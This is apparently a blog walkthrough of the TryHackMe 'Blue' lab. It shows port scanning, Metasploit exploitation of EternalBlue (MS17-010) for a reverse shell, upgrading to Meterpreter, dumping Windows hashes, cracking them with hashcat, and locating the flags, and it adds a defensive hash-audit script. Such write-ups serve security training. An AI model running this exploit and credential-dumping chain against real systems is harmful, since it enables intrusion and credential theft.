TryHackMe: Blue
Walkthrough
Hola folks, Naman this side. Hope you are doing good on your side of the screen. So, let’s start exploiting our room.
Also, I made this little thumbnail for this blog, lemme know how it is :)

Recon:
At the start, I would like to export the IP to save time XD. Later you can use it with $IP

So, let’s start with rustscan, it’s a faster tool to find open ports:
rustscan -a $IP | tee rustscan.txt
| ‘tee’ for saving the output to a file

Now that we have the open ports, let’s begin with Nmap:
nmap -A -Pn -oN nmap.txt $IP
| -A for all (OS and version detection, script scanning, traceroute), -Pn for ignoring ping, -oN for saving the output

Now we can see that port 139 is using Windows 7 Professional 7601 Service Pack 1 netbios-ssn. After some searching, it turned out to be vulnerable, and the exploit is known as ‘EternalBlue’ SMB Remote Code Execution (MS17-010).

Getting Shell:
Now we know how to exploit it, so what are we waiting for?
I used Metasploit for exploiting the same.
msfconsole -q
| -q for quiet mode: accessing the interface directly, without the startup banner
Now search for the exploit

Now it’s time to use the exploit and set the payload for the reverse shell.
use 0
or use exploit/windows/smb/ms17_010_eternalblue

Set the payload and run / exploit

Shell Upgrade: Meterpreter
search shell_to_meterpreter
and use it
set SESSION 1
and run

Cracking:

Let’s run another open session

I don’t know why, but my sessions kept getting closed till I got the 5th session.
Access it via sessions -i <session ID>

Getting Hash dump:
| From now on, screenshots will have another appearance coz I used Terminator instead of Terminal.
run post/windows/gather/hashdump

Crack it using hashcat
hashcat --username -a 0 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
And we got, Password of Jon: alqfna22
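
Metasploit's hashdump prints one account per line in pwdump format (user:RID:LM hash:NT hash:::), and -m 1000 is hashcat's NTLM mode. As an added example (not part of the original walkthrough), this script audits such a dump from the defender's side for blank passwords, stored LM hashes and password reuse; the sample accounts and hashes are constructed.

```python
from collections import defaultdict

# Well-known hashes of the empty string: LM and NT (NTLM) respectively.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in pwdump format (user:RID:LM:NT:::); not output from the room.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1000:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:00112233445566778899AABBCCDDEEFF:::
legacy:1002:0123456789abcdef0123456789abcdef:ffeeddccbbaa99887766554433221100:::
not a hash line
"""

def is_hash(value):
    """True for a 32-character hex string (the size of an LM or NT hash)."""
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value)

def parse_pwdump(text):
    """Yield (user, rid, lm, nt) per valid line; malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if is_hash(lm) and is_hash(nt):
            yield parts[0], int(parts[1]), lm, nt

def audit(text):
    """Return accounts with blank passwords, stored LM hashes, and shared NT hashes."""
    blank, lm_stored, by_nt = [], [], defaultdict(list)
    for user, _rid, lm, nt in parse_pwdump(text):
        if nt == EMPTY_NT:
            blank.append(user)          # no password set
            continue
        if lm != EMPTY_LM:
            lm_stored.append(user)      # weak legacy LM hash is still stored
        by_nt[nt].append(user)
    # NTLM is unsalted, so an identical NT hash means an identical password.
    reused = sorted(sorted(users) for users in by_nt.values() if len(users) > 1)
    return {"blank": sorted(blank), "lm_stored": sorted(lm_stored), "reused": reused}

if __name__ == "__main__":
    for finding, accounts in audit(SAMPLE).items():
        print(f"{finding}: {accounts}")
```

Because NTLM hashes are unsalted, every account listed under "reused" falls together as soon as one of them is cracked with a wordlist.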

Flags:
It’s flag time, YO!!
Simply search for it 🤷♂️, HOW? Let’s see
dir *.txt /s

But it’s not showing flag 2. Let’s go deeper
dir flag* /s /p

flag1.txt C:\flag1.txt
flag2.txt C:\Windows\System32\config\flag2.txt
flag3.txt C:\Users\Jon\Documents\flag3.txt
Now we have successfully completed the Blue Room of TryHackMe.
If you came this far then make sure you give your time to provide feedback. It will be much appreciated ❤